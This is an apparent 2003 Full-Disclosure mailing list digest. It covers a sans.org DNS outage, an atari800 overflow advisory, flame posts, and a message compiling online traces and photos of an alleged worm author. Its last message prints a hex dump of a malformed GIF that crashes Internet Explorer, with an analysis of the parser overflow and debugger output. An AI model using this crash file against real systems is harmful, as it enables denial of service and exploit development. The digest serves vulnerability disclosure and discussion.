	> Free, ultra-private instant messaging with Hush Messenger
	> https://www.hushmail.com/services.php?subloc=messenger&l=434
	>
	> Promote security and make money with the Hushmail Affiliate Program:
	> https://www.hushmail.com/about.php?subloc=affiliate&l=427
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	
	--__--__--
	
	Message: 24
	From: "NDG" <nom.de.guerre@...bon.net>
	To: <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 16:43:45 -0500
	
	
	Ya know - I've been meaning to post this all day
	Marq@...uritynewsportal said he was getting there intermittently this
	morning
	So - I figured it was just a matter of time before I could get there from
	here
	
	
	
	
	maybe off topic
	
	can anyone resolve www.sans.org or www.incidents.org?
	I tried several name servers and none return an A record.
	
	%> host www.sans.org ns2.berkeley.edu
	%> host www.sans.org ns1.ems.psu.edu
	%> etc ....
	
	all report not found.
	
	Did they forget to pay the reg fee?
	
	
	--
	
	
	
	Concerned about your privacy? Follow this link to get
	FREE encrypted email: https://www.hushmail.com/?l=2
	
	Free, ultra-private instant messaging with Hush Messenger
	https://www.hushmail.com/services.php?subloc=messenger&l=434
	
	Promote security and make money with the Hushmail Affiliate Program:
	https://www.hushmail.com/about.php?subloc=affiliate&l=427
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	
	
	--__--__--
	
	Message: 25
	Reply-To: "- o s g o -" <osgo@...mail.com>
	From: "- o s g o -" <osgo@...mail.com>
	To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
	Date: Tue, 2 Sep 2003 14:37:19 -0700
	Subject: [Full-Disclosure] Re: atari800 (200309-07)
	
	I think it's wonderful that in today's world, whenever we want to play:
	"Pong" or "Claim Jumper," circa 1982, there's always someone out of the last
	5 remaining earth-bound gamers warning us about a BO, r00ting the box and
	possibly turning the Atari800 emulator into an Intellivision.?   Or worse.
	
	I'm deeply encouraged that the last of the "Great Five Players" can safely
	continue their gaming experience.   Just don't mess with "Pole Position...."
	That's where I draw the line, OK?
	
	Warmest personal regards,
	-osgo
	
	> PACKAGE : atari800
	> SUMMARY : buffer overflow
	> DATE : 2003-09-02 14:03 UTC
	> EXPLOIT : local
	> VERSIONS AFFECTED : <atari800-1.3.0-r1
	> FIXED VERSION : >=atari800-1.3.0-r1
	> CVE : CAN-2003-0630
	>
	> - - - --------------------------------------------------------------------
	-
	>
	> atar800 contains a buffer overflow which could be used by an attacker
	> to gain root privileges. Altough the atari800 package in Gentoo does not
	> install any files suid root we encourage our users to upgrade.
	
	
	--__--__--
	
	Message: 26
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <cta@...in.net>, <full-disclosure@...ts.netsys.com>
	Cc: "'lepkie'" <lepkie@...hmail.com>
	Subject: RE: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 18:38:03 -0400
	
	Did someone at Register.com get conned to switch the name servers for
	SANS to homepc.org?  SANS has their domain name registeration with
	Register.com:
	
	Technical Contact:
	      Register.Com
	      Domain Registrar
	      575 8th Avenue
	      New York, NY 10018
	      US
	      Phone: 902-749-2701
	      Fax..: 902-749-5429
	      Email: domain-registrar@...ister.com
	
	Richard
	
	-----Original Message-----
	From: full-disclosure-admin@...ts.netsys.com
	[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Bernie, CTA
	Sent: Tuesday, September 02, 2003 5:47 PM
	To: full-disclosure@...ts.netsys.com
	Cc: lepkie
	Subject: Re: [Full-Disclosure] sans.org
	
	
	nslookup say:
	NS1.HOMEPC.ORG is authoritative for
	sans.org and incidents.org
	
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	Name:   www.sans.org
	Address: 65.173.218.106
	
	and
	Server:         NS1.HOMEPC.ORG
	Address:        66.129.1.102#53
	
	www.incidents.org       canonical name = incidents.org.
	Name:   incidents.org
	Address: 63.100.47.45
	
	I can get to their webs by IP and http://isc.incidents.org/, so
	maybe someone infected the root servers, www CNAMEs?
	
	
	
	On 2 Sep 2003 at 12:29, lepkie wrote:
	
	> maybe off topic
	>
	> can anyone resolve www.sans.org or www.incidents.org?
	> I tried several name servers and none return an A record.
	>
	> %> host www.sans.org ns2.berkeley.edu
	> %> host www.sans.org ns1.ems.psu.edu
	> %> etc ....
	>
	> all report not found.
	>
	> Did they forget to pay the reg fee?
	>
	>
	> --
	>
	>
	>
	> Concerned about your privacy? Follow this link to get
	> FREE encrypted email: https://www.hushmail.com/?l=2
	>
	> Free, ultra-private instant messaging with Hush Messenger
	> https://www.hushmail.com/services.php?subloc=messenger&l=434
	>
	> Promote security and make money with the Hushmail Affiliate
	> Program:
	> https://www.hushmail.com/about.php?subloc=affiliate&l=427
	>
	> _______________________________________________
	> Full-Disclosure - We believe in it.
	> Charter: http://lists.netsys.com/full-disclosure-charter.html
	>
	
	-
	****************************************************
	Bernie
	Chief Technology Architect
	Chief Security Officer
	cta@...in.net
	Euclidean Systems, Inc.
	*******************************************************
	// "There is no expedient to which a man will not go
	//    to avoid the pure labor of honest thinking."  
	//     Honest thought, the real business capital.   
	//      Observe> Think> Plan> Think> Do> Think>     
	*******************************************************
	
	
	_______________________________________________
	Full-Disclosure - We believe in it.
	Charter: http://lists.netsys.com/full-disclosure-charter.html
	
	
	--__--__--
	
	Message: 27
	From: "Richard M. Smith" <rms@...puterbytesman.com>
	To: <cta@...in.net>, <full-disclosure@...ts.netsys.com>
	Cc: "'lepkie'" <lepkie@...hmail.com>
	Subject: RE: [Full-Disclosure] Email for sans.org?
	Date: Tue, 2 Sep 2003 18:42:06 -0400
	
	Any idea who is receiving email messages being sent to sans.org?
	
	Richard
	
	
	#################################################################
	#################################################################
	#################################################################
	#####
	#####
	#####
	#################################################################
	#################################################################
	#################################################################
	
	
	--__--__--
	
	Message: 28
	From: "james" <hackerwacker@...ermesa.com>
	To: <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 17:03:49 -0600
	
	gtld's can't seem to point an NS to these domains:
	
	[root@...g mrtg]# nslookup
	> server k.gtld-servers.net   
	Default server: k.gtld-servers.net
	Address: 192.52.178.30#53
	> set querytype=NS
	> sans.org
	Server:         k.gtld-servers.net
	Address:        192.52.178.30#53
	
	Non-authoritative answer:
	*** Can't find sans.org: No answer
	
	Authoritative answers can be found from:
	.       nameserver = i.root-servers.net.
	.       nameserver = d.root-servers.net.
	.       nameserver = c.root-servers.net.
	.       nameserver = k.root-servers.net.
	.       nameserver = f.root-servers.net.
	.       nameserver = m.root-servers.net.
	.       nameserver = h.root-servers.net.
	.       nameserver = b.root-servers.net.
	.       nameserver = j.root-servers.net.
	.       nameserver = e.root-servers.net.
	.       nameserver = l.root-servers.net.
	.       nameserver = a.root-servers.net.
	.       nameserver = g.root-servers.net.
	i.root-servers.net      internet address = 192.36.148.17
	d.root-servers.net      internet address = 128.8.10.90
	c.root-servers.net      internet address = 192.33.4.12
	k.root-servers.net      internet address = 193.0.14.129
	f.root-servers.net      internet address = 192.5.5.241
	m.root-servers.net      internet address = 202.12.27.33
	h.root-servers.net      internet address = 128.63.2.53
	b.root-servers.net      internet address = 128.9.0.107
	j.root-servers.net      internet address = 192.58.128.30
	e.root-servers.net      internet address = 192.203.230.10
	l.root-servers.net      internet address = 198.32.64.12
	a.root-servers.net      internet address = 198.41.0.4
	g.root-servers.net      internet address = 192.112.36.4
	>  www.incidents.org
	Server:         k.gtld-servers.net
	Address:        192.52.178.30#53
	
	Non-authoritative answer:
	*** Can't find www.incidents.org: No answer
	
	Authoritative answers can be found from:
	.       nameserver = m.root-servers.net.
	.       nameserver = h.root-servers.net.
	.       nameserver = b.root-servers.net.
	.       nameserver = j.root-servers.net.
	.       nameserver = e.root-servers.net.
	.       nameserver = l.root-servers.net.
	.       nameserver = a.root-servers.net.
	.       nameserver = g.root-servers.net.
	.       nameserver = i.root-servers.net.
	.       nameserver = d.root-servers.net.
	.       nameserver = c.root-servers.net.
	.       nameserver = k.root-servers.net.
	.       nameserver = f.root-servers.net.
	m.root-servers.net      internet address = 202.12.27.33
	h.root-servers.net      internet address = 128.63.2.53
	b.root-servers.net      internet address = 128.9.0.107
	j.root-servers.net      internet address = 192.58.128.30
	e.root-servers.net      internet address = 192.203.230.10
	l.root-servers.net      internet address = 198.32.64.12
	a.root-servers.net      internet address = 198.41.0.4
	g.root-servers.net      internet address = 192.112.36.4
	i.root-servers.net      internet address = 192.36.148.17
	d.root-servers.net      internet address = 128.8.10.90
	c.root-servers.net      internet address = 192.33.4.12
	k.root-servers.net      internet address = 193.0.14.129
	f.root-servers.net      internet address = 192.5.5.241
	> incidents.org
	Server:         k.gtld-servers.net
	Address:        192.52.178.30#53
	
	Non-authoritative answer:
	*** Can't find incidents.org: No answer
	
	Authoritative answers can be found from:
	.       nameserver = c.root-servers.net.
	.       nameserver = a.root-servers.net.
	.       nameserver = k.root-servers.net.
	.       nameserver = b.root-servers.net.
	.       nameserver = g.root-servers.net.
	.       nameserver = e.root-servers.net.
	.       nameserver = f.root-servers.net.
	.       nameserver = m.root-servers.net.
	.       nameserver = h.root-servers.net.
	.       nameserver = j.root-servers.net.
	.       nameserver = l.root-servers.net.
	.       nameserver = i.root-servers.net.
	.       nameserver = d.root-servers.net.
	c.root-servers.net      internet address = 192.33.4.12
	a.root-servers.net      internet address = 198.41.0.4
	k.root-servers.net      internet address = 193.0.14.129
	b.root-servers.net      internet address = 128.9.0.107
	g.root-servers.net      internet address = 192.112.36.4
	e.root-servers.net      internet address = 192.203.230.10
	f.root-servers.net      internet address = 192.5.5.241
	m.root-servers.net      internet address = 202.12.27.33
	h.root-servers.net      internet address = 128.63.2.53
	j.root-servers.net      internet address = 192.58.128.30
	l.root-servers.net      internet address = 198.32.64.12
	i.root-servers.net      internet address = 192.36.148.17
	d.root-servers.net      internet address = 128.8.10.90
	>
	
	
	--__--__--
	
	Message: 29
	From: David Vincent <david.vincent@...htyoaks.com>
	To: "'Full-Disclosure (E-mail)" <full-disclosure@...ts.netsys.com>
	Subject: RE: [Full-Disclosure] sans.org - OFFTOPIC
	Date: Tue, 2 Sep 2003 16:21:50 -0700
	
	> > ----- Original Message -----
	> > From: "lepkie" <lepkie@...hmail.com>
	> > To: <full-disclosure@...ts.netsys.com>
	> > Sent: Tuesday, September 02, 2003 1:29 PM
	> > Subject: [Full-Disclosure] sans.org
	> >
	> > maybe off topic
	> >
	> > can anyone resolve www.sans.org or www.incidents.org?
	> > I tried several name servers and none return an A record.
	> >
	> > %> host www.sans.org ns2.berkeley.edu
	> > %> host www.sans.org ns1.ems.psu.edu
	> > %> etc ....
	> >
	> > all report not found.
	> >
	> > Did they forget to pay the reg fee?
	
	> -----Original Message-----
	> From: Kurt Seifried [mailto:listuser@...fried.org]
	> Sent: September 2, 2003 2:41 PM
	> To: lepkie@...tmail.com; full-disclosure@...ts.netsys.com
	> Subject: Re: [Full-Disclosure] sans.org - OFFTOPIC
	>
	> In a word: yes. They work fine. Your DNS is buggered. Next
	> time I suggest
	> checking a website such as Sam Spade before emailing a list
	> with thousands
	> of subscribers for something as ridiculously trivial as this.
	>
	>
	> Kurt Seifried, kurt@...fried.org
	> A15B BEE5 B391 B9AD B0EF
	> AEB0 AD63 0B4E AD56 E574
	> http://seifried.org/security/
	
	kurt, STFU.
	
	some people may not have the same level of knowledge about troubleshooting
	issues like this.  they will ask questions you and i may be able to answer
	easily.  despite what you feel, they do have a right to read and post to
	these lists (at least, it is outside your purview).
	
	hell, sometimes even "the experts" don't have time to check out a little
	thing and will ask for help too.
	
	because it is trivial to you does not mean it is trivial to someone else.
	
	your trolling/flaming is useless.  it only shows you are not someone who is
	willing to help out, that you are someone it would be a waste of time
	talking to, and that you, in a word, suck.
	
	keep it to yourself.  if you think a post is useless, delete it.  don't
	bitch about it.  take some initiative.
	
	did you have too much coffee today and get all jittery?  or are you quitting
	smoking and are an extra bitch to bear today?  <-- those are rhetorical in
	case you weren't sure.
	
	-d
	
	
	--__--__--
	
	Message: 30
	From: Andre Ludwig <ALudwig@...fingroup.com>
	To:
	Cc: full-disclosure@...ts.netsys.com
	Date: Tue, 2 Sep 2003 16:32:47 -0700
	Subject: [Full-Disclosure] The Worm tard who got busted
	
	
	You guys are amazing sometimes, it looks like a few of you have in fact done
	some googling and some detective work.  Others are simply content on sitting
	on the sidelines and spewing only moderately informative opinions around
	like they are going out of style.
	
	If the topic of what this kid did and how stupid he was interests you go
	ahead and do some more detective work. The kid left one helluva trail on the
	net with SEVERAL postings on trojanforge.net (which has been offline since
	Friday). What was he posting about?  Normal script kiddie things like  y0
	d00dz ch3ck 0utz my l33t st4sh 0f spl01tz 4nd tr0j4nZ.  Not to mention
	asking about several small footprint irc based RAT's.   So 1+1=2, and in my
	book the kid is simply an amateur crook who should get the book thrown at
	him.  He would gain some respect from me if he had more skill, but im not a
	bleeding heart, you do the crime u do the time.   Granted i am not one to
	judge but if i was in the jury there wouldn't be much of a doubt in my mind
	as to who was behind things. 
	
	Wow he even looks to have defaced a site or two.. (look at the title of the
	window that loads)
	http://216.239.37.104/search?q=cache:t12Nd707VCkJ:www.satanosphere.com/+teek
	id&hl=en&ie=UTF-8
	
	Teekids Thoughts on VB6 vs .NET
	http://216.239.53.104/search?q=cache:oY-N3GP1w4cJ:www.trojanforge.net/showth
	read.php%3Fthreadid%3D1715++site:www.trojanforge.net+teekid+trojanforge&hl=e
	n&ie=UTF-8
	
	Teekid Hiting the wrong button (new thread instead of reply)
	http://216.239.53.104/search?q=cache:l8g2yTYshU4J:www.trojanforge.net/showth
	read.php%3Fthreadid%3D2627++site:www.trojanforge.net+teekid+trojanforge&hl=e
	n&ie=UTF-8
	
	Teekid Asking for a small footprint IRC boot with UDP features.
	http://216.239.53.104/search?q=cache:l8g2yTYshU4J:www.trojanforge.net/showth
	read.php%3Fthreadid%3D2627++site:www.trojanforge.net+teekid+trojanforge&hl=e
	n&ie=UTF-8
	
	Teekid Pimping his m4d l33t w4r3z.. (his trojan archive)
	http://216.239.53.104/search?q=cache:RFRMkPANScMJ:www.trojanforge.net/showth
	read/t-36.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	Teekid shopping for a RAT
	http://216.239.53.104/search?q=cache:oSgqX5TAsQMJ:www.trojanforge.net/showth
	read/t-6016.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	Teekid pimping his IRCBOTS site.
	http://216.239.53.104/search?q=cache:SUybKHSk8ncJ:www.trojanforge.net/showth
	read/t-2693.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	Teekid coming to the aid of a fellow RAT developer (what a nice guy)
	http://216.239.37.104/search?q=cache:39FRhHqYu7cJ:www.trojanforge.net/showth
	read/t-5143.html++site:www.trojanforge.net+teekid+trojanforge&hl=en&ie=UTF-8
	
	All this was taken from only one site, if u want u can even find his
	flipping CS scores on several servers.  He wasn't to bad of a shot with a
	M4.
	
	And for fun
	http://asmallvictory.net/archives/jabbahack.jpg
	
	Are all virus coders so stunning and athletic looking?
	http://us.news1.yimg.com/us.yimg.com/p/rids/20030829/i/1062184970.2617294885
	.jpg
	
	Wow ever since the rash of articles about our favorite coder of the week it
	is allot harder to find some of the stuff that i found on fri and sat. Sorry
	for the rant of sorts just sort of irked me that after reading 100 or so
	emails about the kid no one even bothered to bring up any sort of evidence
	that could have been gleamed ( thank god for goggle cache). I would have
	posted more threads by the perp but the site is down, and while im sure with
	some more time and searching i could dig up irc chat logs, and other such
	info i unfortunately have a job to do (even though i hate it).
	
	Andre Ludwig, CISSP
	
	
	--__--__--
	
	Message: 31
	Reply-To: "Kurt Seifried" <listuser@...fried.org>
	From: "Kurt Seifried" <listuser@...fried.org>
	To: "james" <hackerwacker@...ermesa.com>, <full-disclosure@...ts.netsys.com>
	Subject: Re: [Full-Disclosure] sans.org
	Date: Tue, 2 Sep 2003 18:12:11 -0600
	
	>gtld's can't seem to point an NS to these domains:
	>
	>[root@...g mrtg]# nslookup
	>> server k.gtld-servers.net
	>Default server: k.gtld-servers.net
	>Address: 192.52.178.30#53
	>> set querytype=NS
	>> sans.org
	>Server:         k.gtld-servers.net
	>Address:        192.52.178.30#53
	>
	>Non-authoritative answer:
	>*** Can't find sans.org: No answer
	
	
	This is ... rather normal. .org is served by *.NSTLD.COM now. .net and .com
	are still served by *.gtld-servers.net.
	
	It looks like register.com either hosed their database, or hosed records
	while trying to update various records (at the request of the owners or
	someone else, who knows).
	
	A variety of domains appear affected, sans.org, dhsield.org, incidents.org,
	homepc.org, etc. All .org, all related and sharing infrastructure
	aooerently.
	
	Right now I'm inclined towards Occam's razor, this is a technical screw
	up/"normal" DNS modification and not something "evil".
	
	Kurt Seifried, kurt@...fried.org
	A15B BEE5 B391 B9AD B0EF
	AEB0 AD63 0B4E AD56 E574
	http://seifried.org/security/
	
	
	
	
	--__--__--
	
	Message: 32
	Date: Tue, 2 Sep 2003 17:37:31 -0700
	From: Tim <tim-security@...tinelchicken.org>
	To: nonleft@....net
	Cc: zobel@...-online.de, full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] New Microsoft Internet Explorer mshtml.dll Denial of Service?
	
	
	This is helpful.  In addition, thanks to a file format breakdown by
	Caraciola I was able to more reliably crash my IE.  By taking the last
	data block in the file and extending it by a few hundred bytes, I think
	I have found that an overflow exists.  I have begun debugging it, but I
	don't have a lot of good windows tools available to me, so someone else
	should give it a shot (and post to the list).
	
	The file I created, based on the original:
	
	00000000   47 49 46 38  39 61 01 00  01 00 80 00  GIF89a......
	0000000C   00 FF FF FF  00 00 00 21  F9 04 01 00  .......!....
	00000018   00 00 00 2C  00 00 00 00  01 00 01 00  ...,........
	00000024   00 00 01 41  41 41 41 41  41 41 41 41  ...AAAAAAAAA
	00000030   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000003C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000048   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000054   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000060   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000006C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000078   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000084   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000090   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000009C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000A8   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000B4   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000C0   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000CC   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000D8   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000E4   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000F0   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000000FC   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000108   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000114   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000120   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000012C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000138   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000144   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000150   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000015C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000168   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000174   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000180   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	0000018C   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	00000198   41 41 41 41  41 41 41 41  41 41 41 41  AAAAAAAAAAAA
	000001A4   41 41 41 41  41 41 41 41  41 41 00 3B  AAAAAAAAAA.;
	
	
	It appears the subroutine that parses the gif image allocates a buffer
	of length based on the size indicated in the data block.  Then it
	proceeds to read the data block, looking for a 0x00 (or some other
	end-of-block identifier) to quit.  It doesn't limit itself to the block
	size when copying data from the file.
	
	I have not been able to determine whether this is a heap or stack
	overflow.
	
	However, after some fiddling, I have found this problem also affects
	explorer.exe.  Copy the file to a folder in windows, and turning
	on your image preview pane (web content pane, whatever that rubbish is
	on the left side) while viewing that directory.  Then click on the file,
	and when the preview pane tries to render the image, sometimes it
	crashes.
	
	Since a seperate thread of execution does the parsing, race conditions
	are probably what is making the crashes inconsistent.
	
	Anyone else have more to offer?
	
	tim
	
	
	On Tue, Sep 02, 2003 at 05:38:43PM +0200, nonleft@....net wrote:
	> crashes on my side as well
	>
	> win XP no packets in place.
	> so I run my debugger: (sorry german)
	>
	> Der Thread 'Win32 Thread' (0x818) hat mit Code 0 (0x0) geendet.
	> Unbehandelte Ausnahme bei 0x00000005 in : 0xC0000005:
	> Zugriffsverletzung-Leseposition 0x00000005.
	> Eine Ausnahme (erste Chance) bei 0x00000005 in : 0xC0000005:
	> Zugriffsverletzung-Leseposition 0x00000005.
	> Unbehandelte Ausnahme bei 0x00000005 in : 0xC0000005:
	> Zugriffsverletzung-Leseposition 0x00000005.
	>
	> well it tries to do a read function in the memory, were it has not business
	> to do :-)
	> and this causes the system failure and the program has to be restarted
	> 
	> 7FFE02FC  add         byte ptr [eax],al
	> 7FFE02FE  add         byte ptr [eax],al
	> 7FFE0300  mov         edx,esp
	> 7FFE0302  sysenter        
	> 7FFE0304  ret             
	> 7FFE0305  pushfd          
	> 7FFE0306  or          dword ptr [esp],100h
	> 7FFE030D  popfd           
	> 7FFE030E  ret              <---- here comes the downfall :-)
	> 7FFE030F  mov         edx,esp
	> 7FFE0311  syscall         
	> 7FFE0313  ret             
	> 7FFE0314  nop             
	> 7FFE0315  pushfd          
	> 7FFE0316  or          dword ptr [esp],100h
	>
	> so it comes from:
	>
	>         7ffe0304()     
	>         ntdll.dll!77f6f4af()   
	>         ntdll.dll!77f6e265()   
	>         mshtml.dll!74877f58()  
	> >       mshtml.dll!74877576()  
	>  that was it on my machine.....
	>
	> reproduced it twice.
	> but i could not see what this behavior evoked in the html code?!?!
	> first i thought could have something to do with the embedded scripts, but
	> doesn't seem so....  
	>
	> btw not using Outlook (and i could not see why this should have something to
	> do with it)
	>
	>
	> mfg/kind regards
	>
	> nonleft
	> At 13:53 02.09.2003 +0200, you wrote:
	>
	> Hi,
	>
	> > No, I am very sure that this happens also, if you follow the link inside
	> > a web page only (without an involving mail client).
	>
	> > So go to http://www.counterpane.com/crypto-gram.html , scroll down and
	> > click the link that says "Holger Hasselbach has translated several
	> > issues of Crypto-Gram into German [...]". The error occurs as described
	> > in my original posting.
	>
	>
	> well i tried
	>
	> windows 2003 server no updates
	>
	> first time i clicked it page closed after 5 seconds
	>
	> second time nothing happened
	>
	> third time it closed after 5 seconds
	>
	> well 4th time nothing happened
	>
	> 5th time closed again
	>
	> eaach time i spawned a new ie-window with the link and then followed
	> the one in the bottom
	>
	> mfg
	>
	> Michel Zobel
	> Software Entwicklung
	> hnw health network GmbH i.G.
	>
	> --
	> COMPUTERBILD 15/03: Premium-e-mail-Dienste im Test
	> --------------------------------------------------
	> 1. GMX TopMail - Platz 1 und Testsieger!
	> 2. GMX ProMail - Platz 2 und Preis-Qualit?tssieger!
	> 3. Arcor - 4. web.de - 5. T-Online - 6. freenet.de - 7. daybyday - 8. e-Post
	> HTTP/1.1 200 OK
	> Date: Tue, 02 Sep 2003 15:21:25 GMT
	> Server: Apache
	> Last-Modified: Thu, 28 Aug 2003 19:52:06 GMT
	> ETag: "2dc9a-9cb7-3f4e5d66"
	> Accept-Ranges: bytes
	> Content-Length: 40119
	> Connection: close
	> Content-Type: text/html
	>
	> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
	>
	> <html>
	>
	> <head>
	>
	>  <title>Counterpane: Crypto-Gram</title>
	> 
	>  <link rel="STYLESHEET" type="text/css" href="cp.css">
	> 
	>  <script></script>
	>  <script src="scripts/cp-5.js"></script>
	>
	>  <script>
	> 
	>  var nameMenus = new Array('menuCompany', 'menuServices', 'menuCustomers', 'menuNews', 'menuLibrary', 'menuSite', 'menuContact');
	>  var menuImgNames = new Array();
	>  menuImgNames['menuCompany'] = 'nav_4_company';
	>  menuImgNames['menuServices'] = 'nav_4_services';
	>  menuImgNames['menuCustomers'] = 'nav_5_customers';
	>  menuImgNames['menuNews'] = 'nav_new_news';
	>  menuImgNames['menuLibrary'] = 'nav_new_library';
	>  menuImgNames['menuSite'] = 'nav_new_site';
	>  menuImgNames['menuContact'] = 'nav_5_contact';
	> 
	>  function init(){
	>   
	>    loaded = true;
	>    if (ns4) {
	>   window.captureEvents(Event.RESIZE);
	>   window.onresize = netscapeResize;
	>   document.alinkColor="#666666";
	>   document.vlinkColor="#666666";
	>    }
	>    else if (!ie4 && DOM) {
	>   document.getElementById("menuCompany").style.display = "";
	>     document.getElementById("menuServices").style.display = "";
	>   document.getElementById("menuCustomers").style.display = "";
	>     document.getElementById("menuNews").style.display = "";
	>   document.getElementById("menuLibrary").style.display = "";
	>   document.getElementById("menuSite").style.display = "";
	>   document.getElementById("menuContact").style.display = "";
	>    }
	>   
	>    returnLayer("menuCompany");
	>    returnLayer("menuServices");
	>    returnLayer("menuCustomers");
	>    returnLayer("menuNews");
	>    returnLayer("menuLibrary");
	>    returnLayer("menuSite");
	>    returnLayer("menuContact");
	>  }
	>  </script>
	> </head>
	>
	> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="init()" alink="#666666" vlink="#666666" bgcolor="#FFFFFF" text="#000000">  
	>
	>
	> <!-- top navigation ------------------------------------------>
	> <table width="100%" cellspacing="0" cellpadding="0" border="0">
	>
	>   <tr>
	>  
	>     <!-- logo ------------------------------------------------>
	>    <td width="146"  bgcolor="#FFFFFF"><a href="index.html"><img src="images/cplogo.gif" alt="COUNTERPANE LOGO" border="0" width="132" height="87" hspace="5" vspace="15"></a><br>
	>   <img src="images/clear.gif" alt="" border="0" width="146" height="10" vspace=0 hspace=0></td>
	> 
	>  <td width="100%" valign="top" align="left" height=70>
	> 
	>    <!-- menu bar -->
	>       <table width="100%" cellspacing="0" cellpadding="0" border="0">
	>           <tr bgcolor="#001851">
	>           <script language="JavaScript" type="text/javascript">
	>     <!--
	>       document.writeln('<td width="76"><a href="#" onMouseover="menuOn(\'menuCompany\')" onMouseout="overChecker(\'menuCompany\')"><img name="nav_4_company" src="images/nav_4_company.gif" width="76" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuServices\')" onMouseout="overChecker(\'menuServices\')"><img name="nav_4_services" src="images/nav_4_services.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuCustomers\')" onMouseout="overChecker(\'menuCustomers\')"><img name="nav_5_customers" src="images/nav_5_customers.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuNews\')" onMouseout="overChecker(\'menuNews\')"><img name="nav_new_news" src="images/nav_new_news.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuLibrary\')" onMouseout="overChecker(\'menuLibrary\')"><img name="nav_new_library" src="images/nav_new_library.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuSite\')" onMouseout="overChecker(\'menuSite\')"><img name="nav_new_site" src="images/nav_new_site.gif" width="78" height="26" border="0"></a></td>');
	>       document.writeln('<td width="78"><a href="#" onMouseover="menuOn(\'menuContact\')" onMouseout="overChecker(\'menuContact\')"><img name="nav_5_contact" src="images/nav_5_contact.gif" width="78" height="26" border="0"></a></td>');
	>
	>     //-->
	>     </script>
	>     <noscript>
	> <td width="76"><a href="#"><img alt="" src="images/clear.gif" width="76" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="78"><a href="#"><img alt="" src="images/clear.gif" width="78" height="26" border="0"></a></td>
	> <td width="70"><a href="sitemap.html"><img alt="SITE MAP" src="images/nav_new_sitemap.gif" width="70" height="26" border="0"></a></td>   
	>     </noscript>
	>    <td width="70"><img src="images/clear.gif" alt="" width="70" height="5" border="0"></td>
	>             <td width="14"><img src="images/clear.gif" alt="" width="14" height="1"></td>
	>             <td width="2"><img src="images/clear.gif" alt="" width="2" height="1"></td>
	>           <td background="images/angle.gif" width="100%" bgcolor="#FFFFFF"><img src="images/clear.gif" alt="" width="1" height="1"></td>
	>           </tr>
	>    
